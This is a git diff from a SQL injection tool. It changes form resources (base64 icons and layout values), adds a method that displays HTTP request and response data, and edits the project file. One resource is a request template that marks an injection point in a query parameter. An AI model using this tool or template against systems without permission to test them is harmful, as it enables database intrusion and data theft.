iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 - YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG - YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 - 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw - bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc - VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 - c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 - Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo - mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ - kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D - TgDQASA1MVpwzwAAAABJRU5ErkJggg== - - - - - iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 - YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG - YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 - 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw - bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc - VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 - c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 - Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo - mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ - kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D - TgDQASA1MVpwzwAAAABJRU5ErkJggg== - - - - - iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 - YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG - YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 - 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw - bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc - VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 - c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 - Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo - mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ - kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D - TgDQASA1MVpwzwAAAABJRU5ErkJggg== - - - - 404, 11 - - - 267, 52 - - - - AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w - LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0 - ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAACq - DQAAAk1TRnQBSQFMAgEBBwEAAcgBBgHIAQYBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo - AwABQAMAASADAAEBAQABCAYAAQgYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA - AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5 - AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA - AWYDAAGZAwABzAIAATMDAAIzAgABMwFmAgABMwGZAgABMwHMAgABMwH/AgABZgMAAWYBMwIAAmYCAAFm - AZkCAAFmAcwCAAFmAf8CAAGZAwABmQEzAgABmQFmAgACmQIAAZkBzAIAAZkB/wIAAcwDAAHMATMCAAHM - AWYCAAHMAZkCAALMAgABzAH/AgAB/wFmAgAB/wGZAgAB/wHMAQABMwH/AgAB/wEAATMBAAEzAQABZgEA - ATMBAAGZAQABMwEAAcwBAAEzAQAB/wEAAf8BMwIAAzMBAAIzAWYBAAIzAZkBAAIzAcwBAAIzAf8BAAEz - AWYCAAEzAWYBMwEAATMCZgEAATMBZgGZAQABMwFmAcwBAAEzAWYB/wEAATMBmQIAATMBmQEzAQABMwGZ - AWYBAAEzApkBAAEzAZkBzAEAATMBmQH/AQABMwHMAgABMwHMATMBAAEzAcwBZgEAATMBzAGZAQABMwLM - AQABMwHMAf8BAAEzAf8BMwEAATMB/wFmAQABMwH/AZkBAAEzAf8BzAEAATMC/wEAAWYDAAFmAQABMwEA - AWYBAAFmAQABZgEAAZkBAAFmAQABzAEAAWYBAAH/AQABZgEzAgABZgIzAQABZgEzAWYBAAFmATMBmQEA - AWYBMwHMAQABZgEzAf8BAAJmAgACZgEzAQADZgEAAmYBmQEAAmYBzAEAAWYBmQIAAWYBmQEzAQABZgGZ - AWYBAAFmApkBAAFmAZkBzAEAAWYBmQH/AQABZgHMAgABZgHMATMBAAFmAcwBmQEAAWYCzAEAAWYBzAH/ - AQABZgH/AgABZgH/ATMBAAFmAf8BmQEAAWYB/wHMAQABzAEAAf8BAAH/AQABzAEAApkCAAGZATMBmQEA - AZkBAAGZAQABmQEAAcwBAAGZAwABmQIzAQABmQEAAWYBAAGZATMBzAEAAZkBAAH/AQABmQFmAgABmQFm - ATMBAAGZATMBZgEAAZkBZgGZAQABmQFmAcwBAAGZATMB/wEAApkBMwEAApkBZgEAA5kBAAKZAcwBAAKZ - Af8BAAGZAcwCAAGZAcwBMwEAAWYBzAFmAQABmQHMAZkBAAGZAswBAAGZAcwB/wEAAZkB/wIAAZkB/wEz - AQABmQHMAWYBAAGZAf8BmQEAAZkB/wHMAQABmQL/AQABzAMAAZkBAAEzAQABzAEAAWYBAAHMAQABmQEA - AcwBAAHMAQABmQEzAgABzAIzAQABzAEzAWYBAAHMATMBmQEAAcwBMwHMAQABzAEzAf8BAAHMAWYCAAHM - AWYBMwEAAZkCZgEAAcwBZgGZAQABzAFmAcwBAAGZAWYB/wEAAcwBmQIAAcwBmQEzAQABzAGZAWYBAAHM - ApkBAAHMAZkBzAEAAcwBmQH/AQACzAIAAswBMwEAAswBZgEAAswBmQEAA8wBAALMAf8BAAHMAf8CAAHM - Af8BMwEAAZkB/wFmAQABzAH/AZkBAAHMAf8BzAEAAcwC/wEAAcwBAAEzAQAB/wEAAWYBAAH/AQABmQEA - AcwBMwIAAf8CMwEAAf8BMwFmAQAB/wEzAZkBAAH/ATMBzAEAAf8BMwH/AQAB/wFmAgAB/wFmATMBAAHM - AmYBAAH/AWYBmQEAAf8BZgHMAQABzAFmAf8BAAH/AZkCAAH/AZkBMwEAAf8BmQFmAQAB/wKZAQAB/wGZ - AcwBAAH/AZkB/wEAAf8BzAIAAf8BzAEzAQAB/wHMAWYBAAH/AcwBmQEAAf8CzAEAAf8BzAH/AQAC/wEz - AQABzAH/AWYBAAL/AZkBAAL/AcwBAAJmAf8BAAFmAf8BZgEAAWYC/wEAAf8CZgEAAf8BZgH/AQAC/wFm - AQABIQEAAaUBAANfAQADdwEAA4YBAAOWAQADywEAA7IBAAPXAQAD3QEAA+MBAAPqAQAD8QEAA/gBAAHw - AfsB/wEAAaQCoAEAA4ADAAH/AgAB/wMAAv8BAAH/AwAB/wEAAf8BAAL/AgAD/wEAEP8wAA/vAf8PvAUA - AQcBcgFPA0kBcgEHFAAP7wH/D+8EAAGYAU8BUASYAU8BSQEcEwAB7w3/Ae8B/wHvDf8B7wMAAZgBTwF4 - AQgBmAKXAZgBCAGXAUkBHBIAAe8B/wLcAv8C3AL/AtwC/wHvAf8B7wL/CdwC/wHvAgABBwFPAXgBCAaX - AQgBlwFJAQcRAAHvAf8C3AL/AtwC/wLcAv8B7wH/Ae8C/wncAv8B7wIAAXgBVgEIApcBeAEbAZgDlwEI - AU8BchEAAe8B/wLcAv8C3AL/AtwC/wHvAf8B7w3/Ae8CAAFQApgBlwF4A/8BmAKXApgBTxEAAe8B/wLc - Av8C3AL/AtwC/wHvAf8B7wL/CdwC/wHvAgABTwGYAZcBeAL/AfQC/wGYApcBmAFJEQAB7wH/AtwC/wLc - Av8C3AL/Ae8B/wHvAv8J3AL/Ae8CAAFVAQgBeAGXAQgB8QGXAQgC/wGYAZcBmAFPEQAB7w3/Ae8B/wHv - Df8B7wIAAVYCmAWXAQgB/wHzApgBTxEAAe8B9AvyAfQB7wH/Ae8B9AvyAfQB7wIAAZgBlwEIBpcBCAGX - AQgBUAGXEQABtA2zAbQB/wG0DbMBtAIAAQgBVgF4AQgGlwEIAXgBTwEHEQABswEJC9wBCQGzAf8BswEJ - C9wBCQGzAwABmAFWAXgBCAGYAngBmAEIAXgBTwGYEgABswHhC9sB4QGzAf8BswHhC9sB4QGzBAABmAFW - AZcEmAGXAVABmBMAAbMN4gGzAf8Bsw3iAbMFAAEIAZgEVgGYAQcUAA+zAf8Bug2zAbohABD/IAABEg5D - ARIB/w7UAf8gAAFtDv8BbQH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8BAA4HAgAIBwaXAQABbQH/ - ARUEEQEQAxEBEAERARQB/wFtAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEAAQcC/wEHBP8BBwT/ - AQcCAAEHAv8BBwT/AZcECAGXAQABbQH/AeoC/wG8A/8BvAP/AeoB/wFtAf8B1AIZAfQC/wH0ARkBCQPc - AQkB1AH/AQABBwL/AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAFtAf8B6gG8AQcBvAMHAbwCBwG8 - AeoB/wFtAf8O1AH/AQAOBwIACAcGlwEAAesB/wFtAv8BvAP/AbwD/wFtAf8B6wH/AdQC3AEZAvQBGQHc - AdsB2gHTAdQB2wHUAf8BAAEHAv8BBwT/AQcE/wEHAgABBwL/AQcE/wGXBAgBlwEAAesB/wFtAfAIvAHw - AW0B/wHrAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEAAQcC/wEHBP8BBwT/AQcCAAEHAv8BBwT/ - AZcECAGXAQAB6wH/AesC/wHwA/8B8AP/AesB/wHrAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEA - DgcCAAgHBpcBAAHrAf8B6wIZAfEG8gHzAesB/wHrAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AQABBwL/ - AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAHsAf8BkQElASABGQcCAewB/wHsAf8O1AH/AQABBwL/ - AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAHsAf8BkQImAfQBNAVVATQB7AH/AewB/wHUAtwBGQL0 - ARkB3AHbAdoB0wHUAdsB1AH/AQAOMwIACDMGNAEAAewB/wHsARkI8wH0AewB/wHsAf8B1ALcARkC9AEZ - AdwB2wHaAdMB1AHbAdQB/wEAATMCNAEzATQCVQE0ATMBNAJVATQBMwIAATMCNAEzATQCVQc0AQAB7AH/ - AewC/wHzA/8B8wP/AewB/wHsAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AQAOMwIACDMGNAEAAewB/wzs - Af8B7AH/DtQB/yAAAewO/wHsEP8gABDtAUIBTQE+BwABPgMAASgDAAFAAwABIAMAAQEBAAEBBgABARYA - A/8DAAT/BQABAQHwAQ8FAAEBAeABBwUAAQEBwAEDBQABAQGAAQEFAAEBAYABAQUAAQEBgAEBBQABAQGA - AQEFAAEBAYABAQUAAQEBgAEBBQABAQGAAQEFAAEBAYABAQUAAQEBwAEDBQABAQHgAQcFAAEBAfABDwUA - AQEC/wQABP8EAAT/BAABgAEBAYABAQQAAYABAQGAAQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGA - AQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGAAQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGA - AQEEAAGAAQEBgAEBBAAE/wQABP8CAAs= - - - - - iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 - YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG - YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 - 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw - bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc - VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 - c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 - Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo - mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ - kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D - TgDQASA1MVpwzwAAAABJRU5ErkJggg== - - - - - iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 - YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG - YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 - 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw - bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc - VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 - c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 - Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo - mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ - kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D - TgDQASA1MVpwzwAAAABJRU5ErkJggg== - - - - 417, 52 - - 17, 52 + 138, 55 GET /access.asp?id=1<Encode> and#inject#</Encode> HTTP/1.1 @@ -391,24 +391,27 @@ Pragma: no-cache Cache-Control: no-cache,no-store - 988, 14 + 1204, 17 - 806, 14 + 1022, 17 - 648, 14 + 864, 17 + + + 17, 17 - 608, 52 + 729, 55 - 729, 52 + 850, 55 - 852, 52 + 973, 55 - 61 + 108 \ No newline at end of file diff --git a/SuperSQLInjection/ShowResponse.cs b/SuperSQLInjection/ShowResponse.cs index 8fbd329..d7e2763 100644 --- a/SuperSQLInjection/ShowResponse.cs +++ b/SuperSQLInjection/ShowResponse.cs @@ -29,6 +29,17 @@ namespace SuperSQLInjection this.webBrowser1.DocumentText = this.server.body; } + public void setResult() + { + this.txt_requestHeader.Text = this.server.reuqestHeader; + this.txt_requestBody.Text = this.server.reuqestBody; + this.txt_responseHeader.Text = this.server.header; + this.txt_responseBody.Text = this.server.body; + + this.webBrowser1.ScriptErrorsSuppressed = true; + this.webBrowser1.DocumentText = this.server.body; + } + private void txt_responseBody_KeyDown(object sender, KeyEventArgs e) { if (e.Modifiers == Keys.Control && e.KeyCode == Keys.F) diff --git a/SuperSQLInjection/SuperSQLInjection.csproj b/SuperSQLInjection/SuperSQLInjection.csproj index 24e0c99..5a3ccc9 100644 --- a/SuperSQLInjection/SuperSQLInjection.csproj +++ b/SuperSQLInjection/SuperSQLInjection.csproj @@ -123,6 +123,7 @@ Main.cs + @@ -137,7 +138,7 @@ - + @@ -165,6 +166,8 @@ + + @@ -264,7 +267,6 @@ true -